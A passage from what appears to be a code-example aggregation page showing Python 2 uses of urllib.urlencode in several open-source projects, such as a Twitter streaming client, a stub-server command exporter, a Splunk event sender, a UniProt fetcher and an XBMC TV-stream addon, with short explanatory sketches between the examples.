                                print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                                file = open("streamDebug.txt", 'r')
                                filecontents = file.read()
                                file.close()
                                file = open("streamDebug.txt", 'w')
                                file.write(filecontents + "\n" + str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                                file.close()
                            except httplib.BadStatusLine, e:
                                sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.HTTPError, e:
                                sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                                sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                                # Major error assumed - long backoff
                                if e.code > 200:
                                    if self.backofftime == 1:
                                        self.backofftime = 10
                                    else:
                                        self.backofftime *= 2
                                    if self.backofftime > 240:
                                        self.backofftime = 240
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.URLError, e:
                                sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except socket.timeout, e:
                                sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                    print (str(datetime.utcnow()) + " Disconnecting from twitter stream.")
                    file = open("streamDebug.txt", 'r')
                    filecontents = file.read()
                    file.close()
                    file = open("streamDebug.txt", 'w')
                    file.write(filecontents + "\n" + str(datetime.utcnow()) + " Disconnecting from twitter stream.")
                    file.close()
                    if conn1:
                        conn1.close()
                    if self.backofftime > 1:
                        print ("Backing off for " + str(self.backofftime) + " seconds.")
                        time.sleep(self.backofftime)
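
The urlencode call in this example (data = urllib.urlencode({"track": ",".join(keywords)})) turns the comma-joined keyword list into the POST body for the filter stream. A minimal standalone sketch of just that step, runnable on Python 2 or 3; the keyword list is a placeholder:

    try:
        from urllib import urlencode            # Python 2, as used in the example
    except ImportError:
        from urllib.parse import urlencode      # Python 3 equivalent

    keywords = ["bbc", "radio", "news"]          # placeholder keyword list
    postdata = urlencode({"track": ",".join(keywords)})
    print(postdata)                              # track=bbc%2Cradio%2Cnews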

Example 37

Project: kamaelia_
Source File: TwitterStream.py
View license
    def main(self):
        twitterurl = "http://stream.twitter.com/1/statuses/filter.json"

        # Configure authentication for Twitter - temporary until OAuth implemented
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, twitterurl, self.username, self.password)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)

        # Configure proxy and opener
        if self.proxy:
            proxyhandler = urllib2.ProxyHandler({"http" : self.proxy})
            twitopener = urllib2.build_opener(proxyhandler, authhandler)
        else:
            twitopener = urllib2.build_opener(authhandler)

        while not self.finished():
            if self.dataReady("inbox"):

                # Receive keywords and PIDs
                recvdata = self.recv("inbox")
                keywords = recvdata[0]

                # Abide by Twitter's keyword limit of 400
                if len(keywords) > 400:
                    sys.stderr.write('TwitterStream keyword list too long - sending shortened list\n')
                    keywords = keywords[0:400:1]
                    
                pids = recvdata[1]

                # Create POST data
                data = urllib.urlencode({"track": ",".join(keywords)})
                print ("Got keywords: " + data)

                # If using firehose, filtering based on keywords will be carried out AFTER grabbing data
                # This will be done here rather than by Twitter

                # Get ready to grab Twitter data
                urllib2.install_opener(twitopener)
                
                # Identify the client and add a keep alive message using the same timeout assigned to the socket
                headers = {'User-Agent' : "BBC R&D Grabber", "Keep-Alive" : self.timeout, "Connection" : "Keep-Alive"}

                # Connect to Twitter
                try:
                    req = urllib2.Request(twitterurl,data,headers)
                    conn1 = urllib2.urlopen(req,None,self.timeout)
                    self.backofftime = 1 # Reset the backoff time
                    print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                except httplib.BadStatusLine, e:
                    sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except urllib2.HTTPError, e:
                    sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                    sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                    # Major error assumed - long backoff
                    if e.code > 200:
                        if self.backofftime == 1:
                            self.backofftime = 10
                        else:
                            self.backofftime *= 2
                        if self.backofftime > 240:
                            self.backofftime = 240
                    conn1 = False
                except urllib2.URLError, e:
                    sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False
                except socket.timeout, e:
                    sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                    # General network error assumed - short backoff
                    self.backofftime += 1
                    if self.backofftime > 16:
                        self.backofftime = 16
                    conn1 = False

                if conn1:
                    # While no new keywords have been passed in...
                    while not self.dataReady("inbox"):
                        # Collect data from the streaming API as it arrives - separated by carriage returns.
                        try:
                            content = ""
                            # Timer attempt to fix connection hanging
                            # Could possibly force this to generate an exception otherwise - can't be sure if that will stop the read though
                            readtimer = Timer(self.timeout,conn1.close)
                            readtimer.start()
                            while not "\r\n" in content: # Twitter specified watch characters - readline doesn't catch this properly
                                content += conn1.read(1)
                            readtimer.cancel()
                            # Below modified to ensure reconnection is attempted if the timer expires
                            if "\r\n" in content:
                                self.send([content,pids],"outbox") # Send to data collector / analyser rather than back to requester
                                failed = False
                            else:
                                failed = True
                        except IOError, e:
                            sys.stderr.write('TwitterStream IO error: ' + str(e) + '\n')
                            failed = True
                        except Axon.AxonExceptions.noSpaceInBox, e:
                            # Ignore data - no space to send out
                            sys.stderr.write('TwitterStream no space in box error: ' + str(e) + '\n')
                            failed = True
                        except socket.timeout, e:
                            sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                            # General network error assumed - short backoff
                            self.backofftime += 1
                            if self.backofftime > 16:
                                self.backofftime = 16
                            failed = True
                        except TypeError, e:
                            # This pretty much means the connection failed - so let's deal with it
                            sys.stderr.write('TwitterStream TypeError - conn1 failure: ' + str(e) + '\n')
                            failed = True
                        if failed == True and self.reconnect == True:
                            # Reconnection procedure
                            print (str(datetime.utcnow()) + " Streaming API connection failed.")
                            conn1.close()
                            if self.backofftime > 1:
                                print ("Backing off for " + str(self.backofftime) + " seconds.")
                            time.sleep(self.backofftime)
                            print (str(datetime.utcnow()) + " Attempting reconnection...")
                            try:
                                urllib2.install_opener(twitopener)
                                req = urllib2.Request(twitterurl,data,headers)
                                conn1 = urllib2.urlopen(req,None,self.timeout)
                                self.backofftime = 1
                                print (str(datetime.utcnow()) + " Connected to twitter stream. Awaiting data...")
                            except httplib.BadStatusLine, e:
                                sys.stderr.write('TwitterStream BadStatusLine error: ' + str(e) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.HTTPError, e:
                                sys.stderr.write('TwitterStream HTTP error: ' + str(e.code) + '\n')
                                sys.stderr.write('TwitterStream HTTP error: See http://dev.twitter.com/pages/streaming_api_response_codes \n')
                                # Major error assumed - long backoff
                                if e.code > 200:
                                    if self.backofftime == 1:
                                        self.backofftime = 10
                                    else:
                                        self.backofftime *= 2
                                    if self.backofftime > 240:
                                        self.backofftime = 240
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except urllib2.URLError, e:
                                sys.stderr.write('TwitterStream URL error: ' + str(e.reason) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                            except socket.timeout, e:
                                sys.stderr.write('TwitterStream socket timeout: ' + str(e) + '\n')
                                # General network error assumed - short backoff
                                self.backofftime += 1
                                if self.backofftime > 16:
                                    self.backofftime = 16
                                conn1 = False
                                # Reconnection failed - must break out and wait for new keywords
                                break
                    print (str(datetime.utcnow()) + " Disconnecting from twitter stream.")
                    if conn1:
                        conn1.close()
                    if self.backofftime > 1:
                        print ("Backing off for " + str(self.backofftime) + " seconds.")
                        time.sleep(self.backofftime)
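
In this variant the urlencoded keyword string is passed as the data argument of urllib2.Request, which is what makes the library issue a POST instead of a GET. A small sketch of that pattern without opening the connection; the keywords are placeholders and the URL/headers are copied from the example:

    try:                                          # Python 2, matching the example
        from urllib import urlencode
        from urllib2 import Request
    except ImportError:                           # Python 3 equivalents
        from urllib.parse import urlencode
        from urllib.request import Request

    body = urlencode({"track": "keyword1,keyword2"})
    if not isinstance(body, bytes):               # Python 3 request bodies must be bytes
        body = body.encode("utf-8")
    req = Request("http://stream.twitter.com/1/statuses/filter.json", body,
                  {"User-Agent": "BBC R&D Grabber", "Connection": "Keep-Alive"})
    print(req.get_method())                       # POST - supplying a body switches the method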

Example 38

Project: mirage
Source File: cmds.py
View license
    def run_command(self, url, priority):
        data = ''
        log.debug('url.path={0}'.format(url.path))
        cmd_path = url.geturl()
        parent_path = self.location(os.path.dirname(self.cmd_file_url))[0] + '/'
        if url.path == 'import/bookmarks':
            loc = parse_qs(url.query).get('location')
            if loc:
                loc = loc[0]
            else:
                raise exception_response(400,
                                         title="missing 'location' param executing import/bookmarks")
            target_url = self.location(urljoin(parent_path, loc))[0]
            log.debug('run_command: {0}'.format(target_url))
            import_cmd_url = self.location(
                'stubo/api/import/bookmarks?location={0}'.format(target_url))[0]
            response, _, status_code = UrlFetch().get(import_cmd_url)
            return status_code

        elif url.path == 'put/stub':
            # Note: delay policy is an optional param, the text matchers & 
            # response start after the first ","
            query, _, matchers_response = url.query.partition(',')
            query_params = parse_qs(query)
            delist_arguments(query_params)
            if 'session' not in query_params:
                raise exception_response(400, title="Missing 'session' param in"
                                                    " query: {0}".format(url.query))
            if 'priority' not in query_params:
                query_params['priority'] = priority
            matchers_response = u''.join(matchers_response.split()).strip()
            matchers_response = matchers_response.split(',')
            response_fname = matchers_response[-1].strip()
            matchers = matchers_response[:-1]
            request_matchers = []
            for matcher in matchers:
                if matcher[:4] == 'url=':
                    matcher_data_url = matcher[4:]
                    matcher_text, _, _ = UrlFetch().get(matcher_data_url)
                elif matcher[:5] == 'text=':
                    matcher_text = matcher[5:]
                else:
                    matcher_data_url = urljoin(parent_path, matcher)
                    matcher_text, _, _ = UrlFetch().get(matcher_data_url)
                request_matchers.append(matcher_text)

            if response_fname[:4] == 'url=':
                response_data_url = response_fname[4:]
                response_text, _, _ = UrlFetch().get(response_data_url)
            elif response_fname[:5] == 'text=':
                response_text = response_fname[5:]
            else:
                response_data_url = urljoin(parent_path, response_fname)
                response_text, hdrs, _ = UrlFetch().get(response_data_url)
                if 'application/json' in hdrs["Content-Type"]:
                    try:
                        response_text = json.dumps(response_text)
                    except Exception:
                        pass

            if not response_text:
                raise exception_response(400,
                                         title="put/stub response text can not be empty.")

            stub_payload = create(request_matchers, response_text)
            cmd_path = url.path + '?{0}'.format(urlencode(query_params))
            url = self.get_url(cmd_path)
            log.debug(u'run_command: {0}'.format(url))
            response = UrlFetch().post(url, data=None, json=stub_payload)
            return response.status_code

        elif url.path == 'get/response':
            # get/response?session=foo_1, my.request
            query, _, request_fname = url.query.partition(',')
            query_params = parse_qs(query)
            if 'session' not in query_params:
                raise exception_response(400, title="Missing 'session' param in"
                                                    " query: {0}".format(url.query))
            request_fname, _, header_args = request_fname.partition(',')
            request_fname = request_fname.strip()

            if request_fname[:4] == 'url=':
                request_data_url = request_fname[4:]
                request_text, _, _ = UrlFetch().get(request_data_url)
            elif request_fname[:5] == 'text=':
                request_text = request_fname[5:]
            else:
                request_data_url = urljoin(parent_path, request_fname)
                request_text, _, _ = UrlFetch().get(request_data_url)
            data = request_text
            cmd_path = url.path + '?{0}'.format(query)
            url = self.get_url(cmd_path)
            log.debug(u'run_command: {0}'.format(url))
            if isinstance(data, dict):
                # payload is json
                encoded_data = json.dumps(data)
            else:
                encoded_data = data.encode('utf-8')
            headers = {'Stubo-Request-Method': 'POST'}
            if header_args:
                headers.update(dict(x.split('=') for x in header_args.split(',')))
            response = UrlFetch().post(url, data=encoded_data, headers=headers)
            return response.status_code

        elif url.path == 'put/delay_policy':
            url = self.get_url(cmd_path)
            log.debug('run_command: {0}, data={1}'.format(url, data))
            _, _, status_code = UrlFetch().get(url)
            return status_code

        url = self.get_url(cmd_path)
        log.debug(u'run_command: {0}'.format(url))
        encoded_data = data.encode('utf-8')
        response = UrlFetch().post(url, data=encoded_data)
        return response.status_code
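
The put/stub branch above rebuilds its query string with urlencode(query_params) after parse_qs has split it apart (the project-specific delist_arguments helper flattens the single-item lists first). A minimal sketch of that round trip, using urlencode's doseq=True option in place of the helper:

    try:                                          # Python 2
        from urllib import urlencode
        from urlparse import parse_qs
    except ImportError:                           # Python 3
        from urllib.parse import urlencode, parse_qs

    query_params = parse_qs("session=bob_1&priority=10")
    print(query_params)                           # {'session': ['bob_1'], 'priority': ['10']}
    # parse_qs wraps every value in a list; doseq=True stops urlencode from quoting the brackets
    print(urlencode(query_params, doseq=True))    # session=bob_1&priority=10 (key order may vary)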

Example 39

Project: mirage
Source File: export_commands.py
View license
def export_stubs_to_commands_format(handler, scenario_name_key, scenario_name, session_id,
                                    runnable, playback_session, static_dir, export_dir):
    """

    :param handler:
    :param scenario_name_key:
    :param scenario_name:
    :param session_id:
    :param runnable:
    :param playback_session:
    :param static_dir:
    :param export_dir:
    :return: :raise exception_response:
    """
    # cache = Cache(get_hostname(handler.request))
    # scenario_name_key = cache.scenario_key_name(scenario_name)

    # use user arg or epoch time

    if not session_id:
        session_id = int(time.time())
    # session_id = handler.get_argument('session_id', int(time.time()))
    session = u'{0}_{1}'.format(scenario_name, session_id)
    cmds = [
        'delete/stubs?scenario={0}'.format(scenario_name),
        'begin/session?scenario={0}&session={1}&mode=record'.format(
            scenario_name, session)
    ]
    files = []
    scenario = Scenario()
    # get scenario pre stubs for specified scenario
    stubs = list(scenario.get_pre_stubs(scenario_name_key))
    if stubs:
        for i in range(len(stubs)):
            entry = stubs[i]
            stub = Stub(entry['stub'], scenario_name_key)
            # if stub is rest - matcher may be None, checking that
            if stub.contains_matchers() is None:
                cmds.append('# Stub skipped since no matchers were found. Consider using .yaml format for additional '
                            'capabilities')
                # skipping to next stub, this stub is not compatible with .commands format
                continue
            matchers = [('{0}_{1}_{2}.textMatcher'.format(session, i, x), stub.contains_matchers()[x])
                        for x in range(len(stub.contains_matchers()))]
            matchers_str = ",".join(x[0] for x in matchers)
            url_args = stub.args()
            url_args['session'] = session
            module_info = stub.module()
            if module_info:
                # Note: not including put/module in the export, modules are shared
                # by multiple scenarios.
                url_args['ext_module'] = module_info['name']
                url_args['stub_created_date'] = stub.recorded()
                url_args['stubbedSystemDate'] = module_info.get('recorded_system_date')
                url_args['system_date'] = module_info.get('system_date')
            url_args =  urlencode(url_args)
            responses = stub.response_body()
            assert(len(responses) == 1)
            response = responses[0]
            response = ('{0}_{1}.response'.format(session, i), response)
            cmds.append('put/stub?{0},{1},{2}'.format(url_args, matchers_str,
                                                      response[0]))
            files.append(response)
            files.extend(matchers)
    else:
        cmds.append('put/stub?session={0},text=a_dummy_matcher,text=a_dummy_response'.format(session))
    cmds.append('end/session?session={0}'.format(session))

    runnable_info = dict()

    # if this scenario is runnable
    if runnable:
        # playback_session = handler.get_argument('playback_session', None)
        if not playback_session:
            raise exception_response(400,
                                     title="'playback_session' argument required with 'runnable")
        runnable_info['playback_session'] = playback_session

        tracker = Tracker()
        last_used = tracker.session_last_used(scenario_name_key,
                                              playback_session, 'playback')
        if not last_used:
            raise exception_response(400,
                                     title="Unable to find playback session")
        runnable_info['last_used'] = dict(remote_ip=last_used['remote_ip'],
                                          start_time=str(last_used['start_time']))
        playback = tracker.get_last_playback(scenario_name, playback_session,
                                             last_used['start_time'])
        playback = list(playback)
        if not playback:
            raise exception_response(400,
                                     title="Unable to find a playback for scenario='{0}', playback_session='{1}'".format(scenario_name, playback_session))

        cmds.append('begin/session?scenario={0}&session={1}&mode=playback'.format(
            scenario_name, session))
        number_of_requests = len(playback)
        runnable_info['number_of_playback_requests'] = number_of_requests
        for nrequest in range(number_of_requests):
            track = playback[nrequest]
            request_text = track.get('request_text')
            if not request_text:
                raise exception_response(400, title='Unable to obtain playback details, was full tracking enabled?')

            request_file_name = '{0}_{1}.request'.format(session, nrequest)
            files.append((request_file_name, request_text))
            stubo_response_text = track['stubo_response']
            if not isinstance(stubo_response_text, basestring):
                stubo_response_text = unicode(stubo_response_text)
            stubo_response_file_name = '{0}_{1}.stubo_response'.format(session, nrequest)
            files.append((stubo_response_file_name, stubo_response_text))
            url_args = track['request_params']
            url_args['session'] = session
            url_args =  urlencode(url_args)
            cmds.append(u'get/response?{0},{1}'.format(url_args,
                                                       request_file_name))
        cmds.append('end/session?session={0}'.format(session))

    files.append(('{0}.commands'.format(scenario_name),
                  b"\r\n".join(cmds)))

    # checking whether export dir parameter is provided
    if not export_dir:
        export_dir = scenario_name_key.replace(':', '_')
    export_dir_path = os.path.join(static_dir, 'exports', export_dir)

    if os.path.exists(export_dir_path):
        shutil.rmtree(export_dir_path)
    os.makedirs(export_dir_path)

    archive_name = os.path.join(export_dir_path, scenario_name)
    zout = zipfile.ZipFile(archive_name+'.zip', "w")
    tar = tarfile.open(archive_name+".tar.gz", "w:gz")
    for finfo in files:
        fname, contents = finfo
        file_path = os.path.join(export_dir_path, fname)
        with codecs.open(file_path, mode='wb', encoding='utf-8') as f:
            f.write(contents)
        f.close()
        tar.add(file_path, fname)
        zout.write(file_path, fname)
    tar.close()
    zout.close()
    shutil.copy(archive_name+'.zip', archive_name+'.jar')

    files.extend([(scenario_name+'.zip',), (scenario_name+'.tar.gz',),
                  (scenario_name+'.jar',)])
    # getting links
    links = get_export_links(handler, scenario_name_key, files)

    return links
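
Both the put/stub and get/response command lines above are assembled by urlencoding a dict of arguments and splicing the result into a command string. A standalone sketch with placeholder values (argument order may differ between Python versions):

    try:
        from urllib import urlencode              # Python 2, as in the exporter
    except ImportError:
        from urllib.parse import urlencode        # Python 3 equivalent

    session = "first_1446"                         # placeholder session name
    url_args = {"session": session, "priority": 1}
    cmd = "put/stub?{0},{1},{2}".format(urlencode(url_args),
                                        "{0}_0_0.textMatcher".format(session),
                                        "{0}_0.response".format(session))
    print(cmd)   # e.g. put/stub?session=first_1446&priority=1,first_1446_0_0.textMatcher,first_1446_0.response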

Example 40

Project: eventgen
Source File: splunkstream.py
View license
    def flush(self, q):
        if len(q) > 0:
            # For faster processing, we need to break these up by source combos
            # so they'll each get their own thread.
            # Fixes a bug where we're losing source and sourcetype with bundlelines type transactions
            queues = { }
            for row in q:
                if row['source'] is None:
                    row['source'] = ''
                if row['sourcetype'] is None:
                    row['sourcetype'] = ''
                if not row['source']+'_'+row['sourcetype'] in queues:
                    queues[row['source']+'_'+row['sourcetype']] = deque([])

            # logger.debug("Queues setup: %s" % pprint.pformat(queues))
            m = q.popleft()
            while m:
                queues[m['source']+'_'+m['sourcetype']].append(m)
                try:
                    m = q.popleft()
                except IndexError:
                    m = False

            for k, queue in queues.items():
                splunkhttp = None
                if len(queue) > 0:
                    streamout = ""
                    # Should now be getting a different output thread for each source
                    # So therefore, look at the first message in the queue, set based on that
                    # and move on
                    metamsg = queue.popleft()
                    msg = metamsg['_raw']
                    try:
                        index = metamsg['index']
                        source = metamsg['source']
                        sourcetype = metamsg['sourcetype']
                        host = metamsg['host']
                        hostRegex = metamsg['hostRegex']
                    except KeyError:
                        pass
                        
                    logger.debug("Flushing output for sample '%s' in app '%s' for queue '%s'" % (self._sample.name, self._app, self._sample.source))
                    try:
                        if self._splunkMethod == 'https':
                            connmethod = httplib.HTTPSConnection
                        else:
                            connmethod = httplib.HTTPConnection
                        splunkhttp = connmethod(self._splunkHost, self._splunkPort)
                        splunkhttp.connect()
                        urlparms = [ ]
                        if index != None:
                            urlparms.append(('index', index))
                        if source != None:
                            urlparms.append(('source', source))
                        if sourcetype != None:
                            urlparms.append(('sourcetype', sourcetype))
                        if hostRegex != None:
                            urlparms.append(('host_regex', hostRegex))
                        elif host != None:
                            urlparms.append(('host', host))
                        url = '/services/receivers/simple?%s' % (urllib.urlencode(urlparms))
                        headers = {'Authorization': "Splunk %s" % self._sample.sessionKey }

                        while msg:
                            if msg[-1] != '\n':
                                msg += '\n'
                            streamout += msg
                            try:
                                msg = queue.popleft()['_raw']
                            except IndexError:
                                msg = False

                        splunkhttp.request("POST", url, streamout, headers)
                        logger.debug("POSTing to url %s on %s://%s:%s with sessionKey %s" \
                                    % (url, self._splunkMethod, self._splunkHost, self._splunkPort, self._sample.sessionKey))

                    except httplib.HTTPException, e:
                        logger.error('Error connecting to Splunk for logging for sample %s.  Exception "%s" Config: %s' % (self._sample.name, e.args, self))
                        raise IOError('Error connecting to Splunk for logging for sample %s' % self._sample)

                    try:
                        response = splunkhttp.getresponse()
                        data = response.read()
                        if response.status != 200:
                            logger.error("Data not written to Splunk.  Splunk returned %s" % data)
                    except httplib.BadStatusLine:
                        logger.error("Received bad status from Splunk for sample '%s'" % self._sample)
                    logger.debugv("Closing splunkhttp connection")
                    if splunkhttp != None:
                        splunkhttp.close()
                        splunkhttp = None
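
The plugin builds urlparms as a list of (key, value) tuples, which urlencode accepts directly and which keeps the parameters in the order they were appended. A minimal sketch of the receiver URL construction with placeholder metadata:

    try:
        from urllib import urlencode               # Python 2, as in the plugin
    except ImportError:
        from urllib.parse import urlencode         # Python 3 equivalent

    # placeholder metadata for a single event batch
    urlparms = [("index", "main"), ("source", "eventgen"), ("sourcetype", "access_combined")]
    url = '/services/receivers/simple?%s' % urlencode(urlparms)
    print(url)  # /services/receivers/simple?index=main&source=eventgen&sourcetype=access_combined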

Example 41

Project: jcvi
Source File: uniprot.py
View license
def fetch(args):
    """
    %prog fetch "query"
        OR
    %prog fetch queries.txt

    Please provide a UniProt compatible `query` to retrieve data. If `query` contains
    spaces, please remember to "quote" it.

    You can also specify a `filename` which contains queries, one per line.

    Follow this syntax <http://www.uniprot.org/help/text-search#text-search-syntax>
    to query any of the documented fields <http://www.uniprot.org/help/query-fields>
    """
    import re
    import csv
    p = OptionParser(fetch.__doc__)

    p.add_option("--format", default="tab", choices=valid_formats,
            help="download format [default: %default]")
    p.add_option("--columns", default="entry name, protein names, genes,organism",
            help="columns to download, if --format is `tab` or `xls`." +
            " [default: %default]")
    p.add_option("--include", default=False, action="store_true",
            help="Include isoforms when --format is `fasta` or include `description` when" +
            " --format is `rdf`. [default: %default]");
    p.add_option("--limit", default=10, type="int",
            help="Max number of results to retrieve [default: %default]")
    p.add_option("--offset", default=0, type="int",
            help="Offset of first result, used with --limit [default: %default]")
    p.add_option("--skipcheck", default=False, action="store_true",
            help="turn off prompt to check file existence [default: %default]")
    opts, args = p.parse_args(args)

    if len(args) != 1:
        sys.exit(not p.print_help())

    query, = args
    url_params = {}
    if op.exists(query):
        pf = query.rsplit(".", 1)[0]
        list_of_queries = [row.strip() for row in open(query)]
    else:
        # the query is the search term
        pf = query.strip().strip('\"')
        list_of_queries = [pf]
        pf = re.sub(r"\s+", '_', pf)

    assert len(list_of_queries) > 0, \
        "Please provide atleast one input query"

    url_params['format'] = opts.format

    if opts.columns and opts.format in valid_column_formats:
        reader = csv.reader([opts.columns], skipinitialspace=True)
        cols = [col for r in reader for col in r]
        for col in cols:
            assert col in valid_columns, \
                "Column '{0}' is not a valid. Allowed options are {1}".\
                format(col, valid_columns)
        url_params['columns'] = ",".join(cols)

    if opts.include and opts.format in valid_include_formats:
        url_params['include'] = "yes"

    url_params['limit'] = opts.limit
    url_params['offset'] = opts.offset

    outfile = "{0}.{1}".format(pf, opts.format)

    # If noprompt, will not check file existence
    fw = must_open(outfile, "w", checkexists=True, \
            skipcheck=opts.skipcheck)
    if fw is None:
        return

    seen = set()
    for query in list_of_queries:
        if query in seen:
            logging.error("Duplicate query ({0}) found".format(query))
            continue

        url_params['query'] = query

        data = urllib.urlencode(url_params)
        try:
            request = urllib2.Request(uniprot_url, data)
            response = urllib2.urlopen(request)
        except (urllib2.HTTPError, urllib2.URLError,
                RuntimeError, KeyError) as e:
            logging.error(e)
            logging.debug("wait 5 seconds to reconnect...")
            time.sleep(5)
            # skip to the next query rather than falling through without a response
            continue

        page = response.read()
        if not page:
            logging.error("query `{0}` yielded no results".format(query))
            continue

        print >> fw, page

        seen.add(query)

    if seen:
        print >> sys.stderr, "A total of {0} out of {1} queries returned results.".\
                format(len(seen), len(list_of_queries))
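
Each UniProt request above is just the urlencoded url_params dict posted to uniprot_url. A standalone sketch of the encoding step with placeholder query values:

    try:
        from urllib import urlencode               # Python 2, as in the script
    except ImportError:
        from urllib.parse import urlencode         # Python 3 equivalent

    url_params = {                                  # placeholder query and options
        "query": "organism:9606 AND gene:BRCA1",
        "format": "tab",
        "columns": "entry name,protein names,genes,organism",
        "limit": 10,
        "offset": 0,
    }
    data = urlencode(url_params)
    print(data)   # spaces become '+', commas and colons are percent-encoded, ready to POST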

Example 42

Project: xbmc-addons-chinese
Source File: addon.py
View license
def main():
	if param.startswith("?stream="):
		def fixURL(tmpurl):
			tmpurl = tmpurl.replace("vtime.cntv.cloudcdn.net:8000", "vtime.cntv.cloudcdn.net") #Global (HDS/FLV) - wrong port
			tmpurl = tmpurl.replace("tv.fw.live.cntv.cn", "tvhd.fw.live.cntv.cn") #China - 403 Forbidden
			return tmpurl
		
		def tryHLSStream(jsondata, subkey):
			print("Trying stream {0}".format(subkey))
			
			if jsondata["hls_url"].has_key(subkey) and jsondata["hls_url"][subkey] != "":
				try:
					tmpurl = jsondata["hls_url"][subkey]
					tmpurl = fixURL(tmpurl)
					
					req = urllib2.Request(tmpurl)
					conn = urllib2.urlopen(req, timeout=TIMEOUT_S)
					conn.read(8) #Try reading a few bytes
					
					return tmpurl
				except Exception:
					print("{0} failed.".format(subkey))
					print(traceback.format_exc())
			
			return None
		
		def tryFLVStream(jsondata, streamName):
			if jsondata["hds_url"].has_key(streamName):
				url = jsondata["hds_url"][streamName]
				url = url + "&hdcore=2.11.3"
				
				return url
		
		pDialog = xbmcgui.DialogProgress()
		pDialog.create(addon.getLocalizedString(30009), addon.getLocalizedString(30010))
		pDialog.update(0)
		try:
			#Locate the M3U8 file
			resp = urllib2.urlopen("http://vdn.live.cntv.cn/api2/live.do?channel=pa://cctv_p2p_hd" + param[8:])
			data = resp.read().decode("utf-8")
			
			if pDialog.iscanceled(): return
			
			url = None
			jsondata = jsonimpl.loads(data)
			
			urlsTried = 0
			urlsToTry = 5
			
			if jsondata.has_key("hls_url"):
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried * 100 / urlsToTry, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls1"))
					url = tryHLSStream(jsondata, "hls1")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried * 100 / urlsToTry, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls2"))
					url = tryHLSStream(jsondata, "hls2")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried * 100 / urlsToTry, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls3"))
					url = tryHLSStream(jsondata, "hls3")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried * 100 / urlsToTry, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls4"))
					url = tryHLSStream(jsondata, "hls4")
				if url == None:
					urlsTried += 1
					pDialog.update(urlsTried * 100 / urlsToTry, "{0} {1} (HLS)".format(addon.getLocalizedString(30011), "hls5"))
					url = tryHLSStream(jsondata, "hls5")
			
			if pDialog.iscanceled(): return
			
			#if url is None and jsondata.has_key("hls_url"):
			#	tryHLSStream(jsondata, "hls4")
			
			if url is None:
				showNotification(30002)
				pDialog.close()
				return
			
			print("Loading URL {0}".format(url))
			
			auth = urlparse.parse_qs(urlparse.urlparse(url)[4])["AUTH"][0]
			print("Got AUTH {0}".format(auth))
			
			url = url + "|" + urllib.urlencode( { "Cookie" : "AUTH=" + auth } )
			
			print("Built URL {0}".format(url))
			
			pDialog.close()
			xbmc.Player().play(url)
			
		except Exception:
			showNotification(30000)
			print(traceback.format_exc())
			pDialog.close()
			return

	elif param.startswith("?city="):
		city = param[6:]
		
		def addStream(channelID, channelName):
			li = xbmcgui.ListItem(channelName, iconImage=addon_path + "/resources/media/" + city + ".png")
			xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?stream=" + channelID, listitem=li)
		
		if city == "anhui":
			addStream("anqingxinwen", "安庆新闻综合")
		if city == "beijing":
			addStream("btv2", "BTV文艺")
			addStream("btv3", "BTV科教")
			addStream("btv4", "BTV影视")
			addStream("btv5", "BTV财经")
			addStream("btv6", "BTV体育")
			addStream("btv7", "BTV生活")
			addStream("btv8", "BTV青少")
			addStream("btv9", "BTV新闻")
			addStream("btvchild", "BTV卡酷少儿")
			addStream("btvjishi", "BTV纪实")
			addStream("btvInternational", "BTV国际")
		if city == "tianjin":
			addStream("tianjin1", "天津1套")
			addStream("tianjin2", "天津2套")
			addStream("tianjinbh", "滨海新闻综合")
			addStream("tianjinbh2", "滨海综艺频道")
		if city == "guangxi":
			addStream("gxzy", "广西综艺")
		if city == "guangdong":
			addStream("cztv1", "潮州综合")
			addStream("cztv2", "潮州公共")
